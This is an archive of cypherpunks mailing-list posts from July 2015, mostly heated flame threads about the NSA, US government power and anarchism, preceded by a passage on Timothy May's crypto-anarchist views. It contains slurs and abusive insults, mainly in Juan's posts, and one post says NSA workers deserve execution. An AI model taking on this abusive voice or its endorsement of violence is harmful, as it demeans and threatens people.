Before this future arrived, he advocated tax avoidance, insider trading, money laundering, markets for information of all kinds, including military secrets, and what he called assassination markets not only for those who broke contracts or committed serious crime but also for state officials and the politicians he called “Congressrodents”. He recognised that in his future world only elites with control over technology would prosper. No doubt “the clueless 95%” – whom he described as “inner city breeders” and as “the unproductive, the halt and the lame” – “would suffer, but that is only just”. May acknowledged that many cypherpunks would regard these ideas as extreme. He also acknowledged that, while the overwhelming majority of cypherpunks were, like him, anarcho-capitalist libertarians, some were strait-laced Republicans, left-leaning liberals, Wobblies or even Maoists. Neither fact concerned him. The cypherpunks formed a house of many rooms. The only thing they all shared was an understanding of the political significance of cryptography and the willingness to fight for privacy and unfettered freedom in cyberspace. From list at sysfu.com Tue Jul 21 20:59:21 2015 From: list at sysfu.com (Seth) Date: Tue, 21 Jul 2015 20:59:21 -0700 Subject: Welcome to the future JYA! cryptome TLS enabled... In-Reply-To: References: Message-ID: On Tue, 21 Jul 2015 20:28:55 -0700, coderman wrote: > https://cryptome.org/ > > is even EV special! Holy Schnikes, this must mean the rapture is around the corner. Any insight into the change of heart? Judging by JYAs past tirades against crypto, it looked like you were going to have to pull the HTTP protocol out of his cold dead fingers. 
From juan.g71 at gmail.com Tue Jul 21 17:05:08 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 21:05:08 -0300 Subject: an ominous comment In-Reply-To: <55AED624.4090208@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> Message-ID: <55aedde9.4c35370a.72c5.ffffca1c@mx.google.com> On Tue, 21 Jul 2015 16:30:44 -0700 "Stephen D. Williams" wrote: > This is farcical, Right Stephen. That's the only thing you got right. You and others are your own unintentional parody. From juan.g71 at gmail.com Tue Jul 21 17:07:17 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 21:07:17 -0300 Subject: an ominous comment In-Reply-To: References: Message-ID: <55aede6a.4e1b370a.e422f.ffffcd5f@mx.google.com> On Tue, 21 Jul 2015 15:22:58 -0700 coderman wrote: > On 7/20/15, Stephen D. Williams wrote: > >> > >> It has people who say that the NSA does good things > >> (coderman) > > > > They don't? > > defensive mission vs. offensive like the duality of existence, > good and bad, bad and good; polemic extremes always. Thanks coderman. I was slightly annoyed thinking I might have to search the archives to back my claim but you've fully embarrassed yourself (yet again). Appreciated. > > gotta learn offensive to know how to defend. then defender uses to > advance attacks? > > we're fighting this front in many contexts. all the easy lines are > drawn, and the problems left hard to impossible. > > --- > > i don't know if you have good or bad intentions, Juan. Of course. 
If I were murdering people left and right, or committing any of the endless list of crimes your government commits, then you'd be quite sure that I have GOOD intentions. But, since I'm not buying any of your stupid propaganda, you're not sure if I'm an outright terrist...or somebody sitting at a desk near you, right? > > but i hope you know what i like about NSA is their defensive support, > and i miss the days when they weren't raving drunk with offensive > addiction pointed domestically... Ah yes. You are right. The real problem with the NSA and the US gov't in general is that 'now' they allegedly started spying on AMERICUNTS! How did jesus allow such monstrosity to happen? I mean, burn brown people abroad? Of course. Fun and profit! But spy on white anglo saxon AMERICANS??? How did fucking g-d let that happen. We all pray for the NSA to go back to its defensive anti-terrist activities. > > [ and funny enough, their offensive addiction led to leaks which led > to mass adoption of crypto in ways i never imagined could happen. so > might even say a BAD NSA is good for privacy. ] Sure. Google and the cloud now are password protected. Nice. 
> > --- > > best regards and intentions, > even to Juan ;P From nickeconopouly at gmail.com Tue Jul 21 18:40:51 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Tue, 21 Jul 2015 21:40:51 -0400 Subject: an ominous comment In-Reply-To: <55aea5dc.cc918c0a.1571.ffffb160@mx.google.com> References: <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> <55aea5dc.cc918c0a.1571.ffffb160@mx.google.com> Message-ID: <20150722014050.GA11545@android> On 07/21, Juan wrote: > On Tue, 21 Jul 2015 09:53:11 -0400 > Nick Econopouly wrote: > > > > The US government does not keep its power over its citizens with > > just brute force and propaganda. It is a complex social relationship, > > and yes a great deal of propaganda is involved. But it is not > > totalitarian the way you frame it. > > > Sure. It's not totalitarian. It's simply based on the free > principle of democracy : obey or die. ok > > You don't need to waste your amazing intellect refuting me, > Nick. I've conceded your point. nah you basically can't understand my emails but ok > > > > > It is not like a children's movie > > where the villains are all ugly and you can tell they are villains > > just from the way they look and talk. The policeman, the marine dude, > > and even the politician or CIA official came from some family and > > applied for the job because it was considered an acceptable way to > > make a living and contribute to society. They are not all evil. It > > doesn't matter if the nasty recipe of them all mixed together makes > > the USA cause/commit atrocities, it's simplistic and basically false > > to act like every one of these USians is evil. > > > Thanks Nick. Now I really get it. People who do evil things are > not evil. They are good. 
You don't get it, at all. Interestingly enough, a lot of anarchist theory agrees with what I said- The idea that people are like blank slates and not good or evil. It says that people are influenced by the world around them and that is what determines their morality, etc. So, for instance, while most people today could not accept or live in an anarchist society (without some... un-indoctrination at the very least), people who are raised in one would find it perfectly normal and agreeable. > > > 1) > > Think of the disgruntled senator or NSA worker who is reading this > > list, As in someone reading it in their free time, not because they were assigned to spook it. Obviously. > > 2) > > Actually, to be honest, you are serving the NSA more than anyone on > > this list, even the "spies". Unintentionally. Indirectly. Whatever. I guess adding a few implied words makes reading comprehension easier for some people. I was not making a statement about your affiliation. > > 3) > > Also, you guys really think there is an NSA-man personally > > reading this list, looking for dissidents? Why would they waste their > > time on this shit? > > > > See Nick, that's the real extent of your intellect. It took you > two paragraphs to flatly contradict yourself. No, it took you two paragraphs to show that you can't understand my basic points. > > > > > The only ones subverting it are the most hardcore > > cypherpunks here, > > Well, thanks for considering me a hardcore cypherpunk? Now think > about what you wrote. You're whining about cypherpunks in a > cypherpunk mailing list. Do you see just how ridiculous you > are? I should have put quotes around "cypherpunks". I think it's laughable for cypherpunks to basically not support some of the most important cryptography around. You are hardcore because of your trolling, and cypherpunk because you are on this list. > > But I get it. What you want is a cypherpunk mailing list full of > obama supporters - like you. Did I get that one right? 
I guess it's too much for someone to openly say they aren't 100% sure how to solve the world's problems or if we can, and doesn't want to affiliate with any specific "ism" prison. > > > > > > who act like pretty much every free cryptography > > program is US propaganda somehow. If juan is an agent, he is doing his > > job very well. > > Thanks. > > > > > > > Many people in the govt. think they are doing good, and to be honest a > > good deal of them are. > > > Humor me. What word do you use to describe your political > beliefs? The problem is one word could never do justice to a diverse, changing view of the world. I tend not to have "political" beliefs anyway, unless you count staying away from politics. My friend is a volunteer firefighter, and most of the firefighters in USA are volunteers. They have a town logo on them, but they are not evil. > > > > > This coming from someone who thinks healthy > > society could exist without a government. > > > Oh OK. You are a fucking nutcase who fancies himself an > anarchist while he praises the US government. again, none of these things are true. My main point was black/white arguments against the government are unrealistic and childish, and can't hope to convince people that it is reasonable to question their society. I was hardly praising anything. What I said about people thinking they are doing good still stands. Ask any police officer, they will think that they are protecting and serving the public. Whether or not that is the actual role of their position. When anti-authoritarians (or anarchists, or whatever people here are) come off as haters of the meany evil poo-poo US government and all of its villains, who will take them/us seriously? > > > I rest my case. > > > > > > > > Citizens think the government is on their side too, and it's not that > > they are simply brainwashed. 
There are no mandatory television hours > > where you have to watch govt propaganda, the two main sources of it > > are in the msm (TV), and at school while the child grows up. It isn't > > north korea, or 1984. The citizens > > don't feel forced, most of them, and it's because the government has > > this habit of NOT being an evil, creepy death cult most of the time. > > The bad stuff happens away from the public view including the stuff > > y'all have mentioned like the CIA mercenary armies and fiddling with > > regimes after WWII. > > > > > > It has apologists of the US marines. > > > > > > It has high ranking scumbags from the CIA. > > > > > > It has commie 'anarchists' who are offended by (and would > > > love to silence) people who badmouth the marines' apologists. > > False. I wouldn't have interjected because then I am contributing to > > the problems of this mailing list, but don't keep telling > > fabrications about me please. > > > > Literally every statement in that sentence is a lie about me. Not > > cool. > > > > > > And NOW it also has a google and cloud apologist. Welcome > > > Stephen =) You are yet another reason to distrust the FLOSS > > > movement and its bloatware. > > > > It's amusing how Juan picked up the "apologist" term from my emails > > and is now using it incorrectly. > > > > -nick > From juan.g71 at gmail.com Tue Jul 21 19:25:53 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 23:25:53 -0300 Subject: an ominous comment In-Reply-To: References: <55aede6a.4e1b370a.e422f.ffffcd5f@mx.google.com> Message-ID: <55aefee6.540f370a.4a711.ffffd806@mx.google.com> On Tue, 21 Jul 2015 19:01:29 -0700 coderman wrote: > On 7/21/15, Juan wrote: > > > > Of course. If I were murdering people left and right, or > > committing any of the endless list of crimes your government > > commits, then you'd be quite sure that I have GOOD > > intentions. > > actually i was thinking of code you've written for common good, LMAO. 
You make up your bullshit as you go eh? What code did you write? Let me know so that I can avoid it. > > > > Ah yes. You are right. The real problem with the NSA and > > the US gov't in general is that 'now' they allegedly started > > spying on AMERICUNTS! > > no, my point about domestic surveillance is that any shred of > restraint they may have had, is now evaporated. bulk spying is always > bad, but done domestic you've gone rogue! > > so Juan, how to fix? Ask your cypherpunk buddies. Or the tor cunts! Or the NSA. I'm told they do good things. And have the best of intentions. From juan.g71 at gmail.com Tue Jul 21 19:58:58 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 23:58:58 -0300 Subject: an ominous comment In-Reply-To: <20150722014050.GA11545@android> References: <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> <55aea5dc.cc918c0a.1571.ffffb160@mx.google.com> <20150722014050.GA11545@android> Message-ID: <55af06a8.421c8c0a.f03b5.0155@mx.google.com> On Tue, 21 Jul 2015 21:40:51 -0400 Nick Econopouly wrote: > Interestingly enough, a lot of anarchist theory agrees with what I > said- The idea that people are like blank slates and not good or > evil. No, that's not what the 'blank slate' metaphor is about. 'blank slate' is a name for the view or doctrine that the 'mind' doesn't have any kind of innate knowledge and that everything comes from experience. In the moral realm it would mean that people don't have INBORN ideas of good and evil BUT that doesn't mean that the concepts are meaningless. Only that they are acquired later in life as the mind develops. On the other hand, the people who don't regard actions as good or evil are amoralist psychos. Nothing to do with anarchism. 
> It says that people are influenced by the world around them and > that is what determines their morality, etc. Sure. 'anarchism' is amoralism. Slavery? Just a historical custom. War? An innocent mistake. Well not a mistake since truth and error are also 'social constructs' - or something like that. > > I was hardly praising anything. What I said about people thinking they > are doing good still stands. Ask any police officer, they will think > that they are protecting and serving the public. 1) that is false. While a 'majority' of your beloved psychos may say that, not necessarily all do. Actually I wouldn't be surprised if the majority admitted **off the record** that they are scumbags who love to boss people around and even get paid for it. 2) even if the majority of cops *said* that they regard themselves as the good guys, so fucking what. Hey. Now I'm a pink elephant. Because I say I'm a pink elephant. J. From zen at freedbms.net Tue Jul 21 18:02:21 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Wed, 22 Jul 2015 01:02:21 +0000 Subject: an ominous comment In-Reply-To: <20150721135311.GA9266@android> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> Message-ID: On 7/21/15, Nick Econopouly wrote: > On 07/21, Juan wrote: >> It has apologists of the US marines. >> >> It has high ranking scumbags from the CIA. >> >> It has commie 'anarchists' who are offended by (and would love >> to silence) people who badmouth the marines' apologists. > False. I wouldn't have interjected because then I am contributing to the > problems of this mailing list, but don't keep telling fabrications about > me please. You were not named in that statement. 
I understood that Juan was talking about someone else there ... but hey, we're all welcome to try on any hat we choose... > Literally every statement in that sentence is a lie about me. Not cool. Literally no statement in that sentence is about you. But if you take it that way, hey, cool by me. >> And NOW it also has a google and cloud apologist. Welcome >> Stephen =) You are yet another reason to distrust the FLOSS movement and >> its bloatware. > > It's amusing how Juan picked up the "apologist" term from my emails and > is now using it incorrectly. Saying something does not make it a fact. I actually picked up on the term and have used it a few times, but whatever, now we're mass debating semantics? I admit it was a favourite pastime but I really need to just no. From zen at freedbms.net Tue Jul 21 18:21:10 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Wed, 22 Jul 2015 01:21:10 +0000 Subject: an ominous comment In-Reply-To: <55AED624.4090208@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> Message-ID: On 7/21/15, Stephen D. Williams wrote: > On 7/21/15 2:03 AM, Zenaan Harkness wrote: >> On 7/21/15, Stephen D. Williams wrote: >>> On 7/20/15 10:32 PM, Juan wrote: >>>> On Mon, 20 Jul 2015 21:36:57 -0700 >>>> "Stephen D. Williams" wrote: >>>>> On 7/20/15 9:07 PM, Juan wrote: >>>>>> Hey. *Now* I get it. >>>>> Anyway, if you're still in the rebelling against authority stage, >>>>> fine, have fun. Good luck with that. In the US, government wise, >>>>> the people are the authority >>>> Really? That's an interesting concept. 
How many lsd doses do >>>> you need in order to reach the parallel universe where that >>>> is reality? Because in this universe, it isn't. >>> You haven't been watching long or closely enough. Things have changed >>> a lot in the US in my lifetime, and it's only speeding up. >> Sadly, individual liberty was not respected enough to capture the >> sanction of foreign thinkers. I'm being extraordinarily conservative >> in my words here... > > "Capture the sanction of foreign thinkers"? Nonsense. Sorry, my bad, USA is hailed by the rest of the world as the pinnacle of the High Moral Ground (TM), almost no one has problems they take issue with, with the USA, and governments round the world are clamouring for a one world order lead by the halo clad Obama (or pick any prior president not including Kennedy). Gee whiz jiggity, I keep gettin my sense and my non sense all mixed up now... apollo-gees, yall. From sdw at lig.net Wed Jul 22 01:37:29 2015 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 22 Jul 2015 01:37:29 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> Message-ID: <55AF5649.7090406@lig.net> On 7/21/15 6:21 PM, Zenaan Harkness wrote: > On 7/21/15, Stephen D. Williams wrote: >> On 7/21/15 2:03 AM, Zenaan Harkness wrote: >>> On 7/21/15, Stephen D. Williams wrote: >>>> On 7/20/15 10:32 PM, Juan wrote: >>>>> On Mon, 20 Jul 2015 21:36:57 -0700 >>>>> "Stephen D. Williams" wrote: >>>>>> On 7/20/15 9:07 PM, Juan wrote: >>>>>>> Hey. *Now* I get it. 
>>>>>> Anyway, if you're still in the rebelling against authority stage, >>>>>> fine, have fun. Good luck with that. In the US, government wise, >>>>>> the people are the authority >>>>> Really? That's an interesting concept. How many lsd doses do >>>>> you need in order to reach the parallel universe where that >>>>> is reality? Because in this universe, it isn't. >>>> You haven't been watching long or closely enough. Things have changed >>>> a lot in the US in my lifetime, and it's only speeding up. >>> Sadly, individual liberty was not respected enough to capture the >>> sanction of foreign thinkers. I'm being extraordinarily conservative >>> in my words here... >> "Capture the sanction of foreign thinkers"? Nonsense. > Sorry, my bad, USA is hailed by the rest of the world as the pinnacle > of the High Moral Ground (TM), almost no one has problems they take > issue with, with the USA, and governments round the world are > clamouring for a one world order lead by the halo clad Obama (or pick > any prior president not including Kennedy). > > Gee whiz jiggity, I keep gettin my sense and my non sense all mixed up > now... apollo-gees, yall. Your sentence is nonsense. I can't parse it. Maybe in the original Russian it was coherent. sdw From sdw at lig.net Wed Jul 22 01:44:30 2015 From: sdw at lig.net (Stephen D. 
Williams) Date: Wed, 22 Jul 2015 01:44:30 -0700 Subject: an ominous comment In-Reply-To: <1437524169.568880.329705825.556F643B@webmail.messagingengine.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> <1437524169.568880.329705825.556F643B@webmail.messagingengine.com> Message-ID: <55AF57EE.8090100@lig.net> On 7/21/15 5:16 PM, Alfie John wrote: > On Wed, Jul 22, 2015, at 09:30 AM, Stephen D. Williams wrote: >> Even when the US meddled, except for a very few circumstances, it was >> to achieve something useful, > Useful to whom? Not to the Chagossians of Diego Garcia in the 60s and > 70s. FFS, the _whole population_ was kicked off the island. You do realize that it was the British that depopulated the islands, right? The land had been purchased, there were about 1200 people displaced, and it happened 40 years ago. In any case, that falls into the category of something that shouldn't have been done, at least not in so poor a way. >> not to subjugate peoples for colonies > Maybe you should read: > > https://en.wikipedia.org/wiki/Depopulation_of_Chagossians_from_the_Chagos_Archipelago > >> provides lots of protection and other benefits, and generally attempts >> fit in and be respectful. > You should stop drinking the Koolaid. > > It's funny how so many patriots love the country they happened to have > been born in. > > Alfie > sdw From sdw at lig.net Wed Jul 22 02:03:07 2015 From: sdw at lig.net (Stephen D. 
Williams) Date: Wed, 22 Jul 2015 02:03:07 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> Message-ID: <55AF5C4B.2040302@lig.net> On 7/21/15 8:49 PM, Seth wrote: > On Tue, 21 Jul 2015 13:54:25 -0700, Lance Cottrell wrote: > >> I recall it being more nuanced and diverse. > > I wasn't there in the beginning so I don't have any firsthand knowledge. > > According to this piece, [1] "Almost all cypherpunks were anarchists who regarded the state as the enemy." I will have to dig to find my archives of that era to be positive, but I'm pretty sure I joined by 1994 at the latest, probably 1993. I installed the first firewall at Bank of America in late 1994, so it may have been much earlier since I'd already been into security for a while at that point. I was part of the whole rise and fall of Detweiler. I'm always puzzled that most people haven't heard of him. http://borg.uu3.net/ldetweil/medusa/detweiler.html > > I'm basing the claim on the fact that founding member Timothy May wasn't exactly shy about his crypto *anarchy* vision of the future. > > Not sure exactly what Eric Hughes or John Gilmore's were at the time. > > > [1] http://onlyinamericablogging.blogspot.jp/2011/03/robert-manne-julian-assange-cypherpunk.html sdw
From rysiek at hackerspace.pl Wed Jul 22 00:08:14 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:08:14 +0200 Subject: In-Reply-To: References: <55AC5B26.8050100@pobox.com> Message-ID: <3561590.t9AOVu5qj6@lapuntu> On Sunday, 19 July 2015 22:31:42 coderman wrote: > does this taper off? or just a constant stream of noise... It's a feature not a... no, wait, it really isn't. :( -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 From rysiek at hackerspace.pl Wed Jul 22 00:10:09 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:10:09 +0200 Subject: Welcome to the future JYA! cryptome TLS enabled... In-Reply-To: References: Message-ID: <37833538.J47TLoDEqM@lapuntu> On Tuesday, 21 July 2015 20:59:21 Seth wrote: > On Tue, 21 Jul 2015 20:28:55 -0700, coderman wrote: > > https://cryptome.org/ > > > > is even EV special! > > Holy Schnikes, this must mean the rapture is around the corner. That's a second place I see the word "rapture" today: http://www.smbc-comics.com/index.php?id=3804 Something's in it, I'm sure! -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147
From rysiek at hackerspace.pl Wed Jul 22 00:20:40 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:20:40 +0200 Subject: an ominous comment In-Reply-To: <55aefee6.540f370a.4a711.ffffd806@mx.google.com> References: <55aefee6.540f370a.4a711.ffffd806@mx.google.com> Message-ID: <5823340.IlZMU9Ofa3@lapuntu> On Tuesday, 21 July 2015 23:25:53 Juan wrote: > (...) -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: scarjo_popcorn.gif Type: image/gif Size: 2293534 bytes Desc: not available URL: From rich at openwatch.net Wed Jul 22 09:23:02 2015 From: rich at openwatch.net (Rich Jones) Date: Wed, 22 Jul 2015 09:23:02 -0700 Subject: Internet Scale Forensic Traffic Correlation Message-ID: Have we seen any evidence of the ability of the NSA/FIVEEYES to do internet or national scale retroactive traffic correlation? Not just for Tor exit nodes, but for any arbitrary connection. For instance, if I upload a 64.32Kb exploit to a server, and they know forensically that the exploit arrived at 12:01:01PM, do they have the capability to see all connections, internet-wide, which sent ~64.32Kb of data within the previous, say, ~500-2000ms? (A useful capability for anybody trying to van paedos behind 7 proxies, but bad news for hackers, junkies and other weirdos.) Technical details around this capability would be very useful for designing high-latency and chaff-based anonymity tools. Ex, a global chaff network to cover a given byte-size range, steganographic proxies, etc.
Another one to add to the list of "if you happen to have access to the Snowden cache, please set this information free" requests (along with any info on compiler backdoors, KH-13, operating system backdoors, transit cards, cryptocurrencies, burners, advertising industry partners, Oracle, Narus, etc etc etc..). Pretty please, massa Greenwald? R From rysiek at hackerspace.pl Wed Jul 22 00:46:59 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:46:59 +0200 Subject: an ominous comment In-Reply-To: <55AD8704.8070104@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> Message-ID: <3661192.mUKEqv19Hn@lapuntu> On Monday, 20 July 2015 19:40:52 Steve Kinney wrote: > On 07/20/2015 05:53 PM, Stephen D. Williams wrote: > > I hold multitudes. I am in one thread totally cypherpunk, and > > have been for a very long time. There are innumerable ways to > > compromise and be compromised for all kinds of good and mostly > > bad reasons. Perfect protection is tough for in many ways and > > we should keep striving to get closer to that ideal security > > stance. > > > > On the other hand, life is a balance. I probably shouldn't > > have tried to make the point here, but it is something a > > security professional should understand well: The right amount > > of security should be moderated by the tradeoff of costs vs. > > overhead vs. maximizing benefit vs. minimizing loss. Security > > stances change over time and aren't necessarily accurately > > reflected by paranoid absolutism. > > Right you are, in "security" context is everything.
My take on > the Cypherpunk Way is, start with design concepts for maximum > security (!= absolute security), then trim the security > constraints back just enough to permit useful work to be done on a > cost effective basis. This should also be the case with privacy. Start with maximum privacy and trim down if absolutely *needed*. -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 From rysiek at hackerspace.pl Wed Jul 22 00:47:52 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:47:52 +0200 Subject: an ominous comment In-Reply-To: <55adc555.0ae88c0a.425f.3132@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> Message-ID: <1588252.tKBBYif51o@lapuntu> On Tuesday, 21 July 2015 01:07:55 Juan wrote: > Hey. *Now* I get it. > > This mailing list has a lot of tor-tards who are apologists of > the pentagon's propaganda and spying efforts. Well, I wouldn't call you a "tor-tard", but if you insist... -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147
From rysiek at hackerspace.pl Wed Jul 22 00:51:57 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 22 Jul 2015 09:51:57 +0200 Subject: an ominous comment In-Reply-To: <55ACB233.8020904@cathalgarvey.me> References: <20150714155203.826F52282E2@palinka.tinho.net> <55ACB233.8020904@cathalgarvey.me> Message-ID: <5753507.exg6TKRYUx@lapuntu> On Monday, 20 July 2015 09:32:51 Cathal Garvey wrote: > I happen to know someone personally who went to one of the largest > social networks out there, and just asked if he could have full backend > access to play around and go data mining. They didn't bat an eyelid and > gave him access to the kind of data you don't get even from the paid API. > > This guy happens to be exceptionally convincing, but he wasn't being > disingenuous; he literally just promised to fish around and see if he > could find and visualise any cool stuff, and they opened up. Then there's that: http://actualfacebookgraphsearches.tumblr.com/ > So, no. Your data isn't remotely safe, not even a little bit. Very much so. -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 From Rayzer at riseup.net Wed Jul 22 09:59:14 2015 From: Rayzer at riseup.net (Razer) Date: Wed, 22 Jul 2015 09:59:14 -0700 Subject: In-Reply-To: References: Message-ID: <55AFCBE2.9010500@riseup.net> On 07/19/2015 06:10 PM, coderman wrote: > joined the twitters recently, > noticed that many of my posts attract "favorite'ers" > > who are honey pots.
E.g.: > - https://twitter.com/AudreySykestfm > - https://twitter.com/EvelynHarri0pp > - https://twitter.com/PenelopeRosap8 > - https://twitter.com/AdalynEsteskul > - https://twitter.com/PazhetnykhMiss > - https://twitter.com/helensmithusacc > - https://twitter.com/RubyFlemingdy5 > - https://twitter.com/KaelynMorenm2g > - https://twitter.com/PeytonKanee97 > - https://twitter.com/LilyArnoldvkm > > maybe social research, or ... ? i guess they think i've got a type :P > > > best regards, > not interested codermange > I get these sorts of follows whenever I hashtag #NSA or use @FBI. I got a large number of them when I suggested the people who work at the NSA were traitors in need of execution. My 'follow-stalkers' are typically 'girls' posting various types of pron interspersed with tweets about a variety of subjects where I inevitably end up seeing the same tweets across the various accounts. Many of the links posted, when not to pron sites go to 'humorous photo gallery' sites, of which most seem to be hosted by... Wait for it, Cloudflare. I report the accounts as spam. I checked a couple of the links you posted and apparently they've already been reported and 'account suspended'. RR Ps. It tapers off until (see top of my comment. Rinse lather repeat) From drwho at virtadpt.net Wed Jul 22 10:02:54 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 22 Jul 2015 10:02:54 -0700 Subject: Welcome to the future JYA! cryptome TLS enabled... In-Reply-To: <37833538.J47TLoDEqM@lapuntu> References: <37833538.J47TLoDEqM@lapuntu> Message-ID: <55AFCCBE.9040505@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/22/2015 12:10 AM, rysiek wrote: >> Holy Schnikes, this must mean the rapture is around the corner.
> > That's a second place I see the word "rapture" today: > http://www.smbc-comics.com/index.php?id=3804 I don't know about the rapture, but I just finished uploading myself... - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Eve was framed! -----BEGIN PGP SIGNATURE----- -----END PGP SIGNATURE----- From drwho at virtadpt.net Wed Jul 22 10:05:17 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 22 Jul 2015 10:05:17 -0700 Subject: an ominous comment In-Reply-To: <55AF5649.7090406@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> <55AF5649.7090406@lig.net> Message-ID: <55AFCD4D.6080408@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/22/2015 01:37 AM, Stephen D. Williams wrote: > Your sentence is nonsense. I can't parse 